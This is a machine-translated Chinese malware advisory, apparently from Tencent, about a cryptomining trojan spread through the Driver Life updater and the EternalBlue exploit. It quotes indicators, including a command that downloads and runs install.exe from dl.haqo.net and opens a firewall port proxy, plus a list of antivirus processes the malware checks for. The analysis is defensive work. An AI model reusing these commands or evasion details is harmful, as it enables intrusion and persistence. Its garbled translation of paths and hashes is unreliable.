据腾讯安全威胁情报中心监测,近日突然爆发了一个通过“驱动人生”升级、通过“永恒之蓝”高危漏洞传播的木马,短短2小时内被攻击用户数达到10万。“命驾”木马会利用高危漏洞在企业内网进行蠕虫式传播,并进一步下载云控木马在中毒电脑上挖掘门罗币。
一、概述
12月14日下午,腾讯安全威胁情报中心监测发现,一个通过“驱动人生”升级,通过“永恒之蓝”高危漏洞传播的木马突然爆发,短短2小时内被攻击用户数达到10万。
“命驾”木马会利用高危漏洞在企业内网进行蠕虫式传播,并进一步下载云控木马在中毒电脑上挖掘门罗币。云木马控制对企业信息安全威胁很大,企业用户要重视。
该病毒恰好在周末时间爆发,让企业网管措手不及。员工电脑周一开机后,建议立即杀毒,然后利用杀毒软件的漏洞修复功能安装系统补丁。个人电脑用户可以使用腾讯电脑管家进行防身。
这次病毒爆发有三个特点:
1.驱动生命升级通道的病毒会在中毒的电脑上安装云控木马;
2.病毒会利用永恒之蓝漏洞在局域网内主动传播;
3.通过云控收集中毒电脑的一些信息,接受云指令挖掘中毒电脑中的门罗币。
特洛伊木马攻击流程图
二。详细分析
Dtlupg.exe访问以下网址下载病毒
hxxp://xxxx . update . ack ng . com/zip tool/pull execute/f 79 CB 9d 2893 b 254 cc 75 DFB 7 F3 e 454 a 69 . exe
hxxp://xxxx . update . ack ng . com/calendar/pull execute/f 79 CB 9d 2893 b 254 cc 75 DFB 7 F3 e 454 a 69 . exe
(注意,为了防止用户点击上面的链接直接下载病毒程序,已经隐藏了一些字符)
该病毒文件发布于:
c:程序文件(x86)dtlsoftriiupdatertrlf
f79cb9d2893b254cc75dbf7f3e454a69.exe等。
f79cb9d2893b254cc75dfb7f3e454a69.exe终于在运行之后发布了C:windowstempsvghost . exe。
(MD5:
2e 9710 a 4b 9 CB 3c d 11 e 977 af 87570 e 3 b)运行,svvhost.exe打包“永恒之蓝”等漏洞攻击工具在内外网进一步传播。
2.1病毒父代
F79CB9D2893B254CC75DFB7F3E454A69.exe
运行后将其自身***到C:windowssystem32svhost.exe,作为服务安装并启动。服务名为Ddiver,然后拉起云控模块svhhost.exe和攻击模块svvhost.exe。
在运行时,检测互斥体以确定它是否被感染。
通过检测以下进程,将收集软件查杀信息并准备上传。
360 tray . exe | 360 SD . exe | ***P . exe | kvmonxp . exe | rav mond . exe | mcshield . exe | egui . exe | kxe tray . exe | knsdtray . exe | tmbmsrv . exe | av center . exe | ash disp . exe | rtvscan . exe | ksafe . exe | qpcrtp . exe
当任务管理器和游戏进程被检测到时,云控制模块svhhost.exe退出。
打开对象名为”的互斥体。我是xmr记者”Xmr的意思是xmrig.exe矿机。
收集系统敏感信息上传到hxxp://I . hago . net/I . png,接受返回的云控制代码执行。
设置父进程共享内存HSKALWOEDJSLALQEOD
2.2采矿
云木马svhhost.exe的主要功能是从父进程svhost.exe的共享内存中读取shellcode进行解密和执行,每隔2000秒从共享内存中读取shellcode进行解密和执行。共享内存被命名为HSKALWOEDJSLALQEOD。目前这个shellcode主要用于挖矿,不排除后面会拉其他更恶意的加密勒索等木马病毒来执行。
云控木马执行过程
云木马运行后会创建一个线程。这个线程函数的主要功能是判断进程svhost.exe(父进程)是否存在。如果它不存在,启动进程,然后从这个进程中读取共享内存数据。
创建一个线程来判断父进程是否存在。
调用OpenFileMappingA打开共享内存,读取共享内存数据。
读取共享内存数据
调用RtlDecompressBuffer函数对共享内存中的数据进行解压缩,为下一次执行做准备。
解压缩共享内存数据
共享内存数据被加压后,就会被执行。目前这个shellcode的主要功能是挖矿,不排除后面会拉其他更恶意的木马病毒,比如加密、勒索等来执行。
执行外壳代码
在尝试采矿时,通信IP是172.105.204.237。
2.3攻击模块
攻击模块是从地址
HXXP://dl . Haq o . net/EB . exez下载的,作为子进程Svvhost.Exe启动。分析发现,该文件是python实现的“永恒之蓝”漏洞利用模块压缩打包程序。
子进程Svvhost.Exe是一个打包程序,压缩了python实现的“永恒之蓝”漏洞利用模块。
My***b.pyo是攻击时的扫码。
相关开源代码也可以在GitHub上看到。
扫描内部网的445端口进行攻击。
不仅攻击内网易受攻击的机器,还随机找几个外网IP尝试攻击,一次攻击后沉默20分钟。
攻击成功后,paylaod在中招的机器中执行以下命令,传播内网。
cmd.exe http://dl.haqo.net/dl.exe c:/install . exe &c:/install.exenetsh防火墙添加端口开放tcp 65531 DNS & ampnetsh接口端口代理add v4tov4 listenport=65531连接地址=1.1.1.1连接端口=53
安全建议
1.服务器暂时关闭不必要的端口(如135、139、445)。请参考:
https://guanjia.qq.com/web _诊所/S8/585.html
2.企业用户周一上班后,建议使用腾讯御点查杀病毒(个人用户可使用腾讯电脑管家),然后使用漏洞修复功能修复全网终端高危漏洞;
3.服务器使用高强度密码,不要使用弱密码,防止黑客暴力破解;
4.使用杀毒软件拦截可能的病毒攻击;
5.建议企业用户部署腾讯御捷高级威胁检测系统,防御可能的黑客攻击。御捷高级威胁检测系统是基于腾讯反病毒实验室的安全能力,依托腾讯在云端和终端的海量数据,打造的独特的威胁情报和恶意检测模型系统。
本文来自果味果冻投稿,不代表舒华文档立场,如若转载,请注明出处:https://www.chinashuhua.cn/24/635262.html
微信扫一扫 
